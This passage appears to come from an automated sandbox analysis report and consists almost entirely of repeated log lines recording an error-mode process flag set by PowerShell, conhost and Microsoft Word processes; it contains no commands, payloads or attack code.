      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
